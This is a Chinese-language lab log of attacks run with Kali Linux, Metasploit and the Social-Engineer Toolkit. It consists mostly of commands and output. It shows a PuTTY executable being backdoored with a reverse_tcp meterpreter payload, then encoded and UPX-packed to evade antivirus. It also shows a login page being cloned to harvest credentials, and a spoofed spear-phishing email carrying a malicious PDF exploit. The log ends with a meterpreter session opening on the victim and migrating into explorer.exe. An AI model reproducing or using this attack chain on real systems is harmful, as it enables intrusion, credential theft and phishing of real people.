本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程
- 伪装木马
- 网站钓鱼
- 邮件钓鱼
###1.伪装木马 ###
# 生成木马的攻击载荷程序
# 现在已经没有msfpayload的命令了,换成msfvenom了,里面集成了msfpayload和msfencode。
# 一个payload生成器Veil-Evasion 项目地址:https://github.com/Veil-Framework/Veil-Evasion #免杀效果较好
# 要攻击的目标主机是 windows 系统,要有回连至监听主机的能力,并支持后渗透攻击功能
http://blog.csdn.net/lzhd24/article/details/50664342
root@attacker:~# msfvenom -l | grep windows | grep reverse_tcp | grep meterpreter
windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
windows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
# 使用第一个 windows/meterpreter/reverse_tcp
root@attacker:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
#先测试一下:
#root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe -o payload.exe
#root@attacker:~# ll payload.exe
# -rw-r--r-- 1 root root 73802 Sep 22 00:10 payload.exe
# 给 putty 程序注入病毒
root@attacker:~# ll putty_0367.exe
-rw-r--r-- 1 root root 531368 9月 22 00:17 putty_0367.exe
root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
a_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 531368 bytes
Saved as: putty_evil.exe
root@attacker:~# ll putty_*
-rw-r--r-- 1 root root 531368 9月 22 00:17 putty_0367.exe
-rw-r--r-- 1 root root 531368 9月 22 00:21 putty_evil.exe
# 将文件植入 windows 之后
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit
# 在此监听的情况下,在 windows 端 打开含有病毒的软件,但也会被杀毒软件拦截
# 加壳防查杀
root@attacker:~# upx -6 -o putty_backdoor.exe putty_evil.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
File size Ratio Format Name
-------------------- ------ ----------- -----------
531368 -> 397736 74.85% win32/pe putty_backdoor.exe
Packed 1 file.
###2. 网站钓鱼 ###
http://www.cnblogs.com/youcanch/articles/5671274.html
root@attacker:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.10.10.128
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html
###3.邮件钓鱼 ###
root@attacker:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 1
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>1
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>8
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Status.pdf
root@attacker:~# cd /root/
root@attacker:~# cd .set/
root@attacker:~/.set# ls
Dvssc_ABC_Project_Status.pdf payload.options template.pdf template.rc
root@attacker:~/.set# ll
总用量 104
-rw-r--r-- 1 root root 46863 9月 25 09:45 Dvssc_ABC_Project_Status.pdf
-rw-r--r-- 1 root root 48 9月 25 09:43 payload.options
-rw-r--r-- 1 root root 46863 9月 25 09:43 template.pdf
-rw-r--r-- 1 root root 150 9月 25 09:43 template.rc
# 查看内容
root@attacker:~/.set# xpdf Dvssc_ABC_Project_Status.pdf
# 然后用 Adobe Acrobat Pro 处理一下
set:phishing>1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
set:phishing>2
set:phishing> Subject of the email:Ki wang
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Please review the ABC project status report
Next line of the body: wo are behind the school^Cset:phishing> Send email to:wangdongpeng@dvssc.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>2
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> The FROM NAME user will see:yourname
set:phishing> Username for open-relay [blank]:yourpasswd
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
# XP打开文件
msf exploit(handler) >
[*] Sending stage (956991 bytes) to 10.10.10.254
[*] Meterpreter session 1 opened (10.10.10.128:443 -> 10.10.10.254:1037) at 2017-09-25 10:16:52 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
240 436 ICQLite.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\ICQLite\ICQLite.exe
388 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
436 1320 explorer.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\Explorer.EXE
640 388 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
664 388 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
708 664 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
720 664 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 708 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
892 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
968 436 msmsgs.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\Messenger\msmsgs.exe
972 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1092 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1148 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1192 436 ctfmon.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\system32\ctfmon.exe
1204 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1276 436 vmtoolsd.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1380 708 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1428 708 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1576 708 HistorySvr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\KingView\HistorySvr.exe
1588 708 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1676 708 sntlkeyssrvr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
1796 1092 wscntfy.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\system32\wscntfy.exe
1936 708 spnsrvnt.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
1984 708 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2648 436 AcroRd32.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
meterpreter > migrate 436
[*] Migrating from 2648 to 436...
[*] Migration completed successfully.
meterpreter >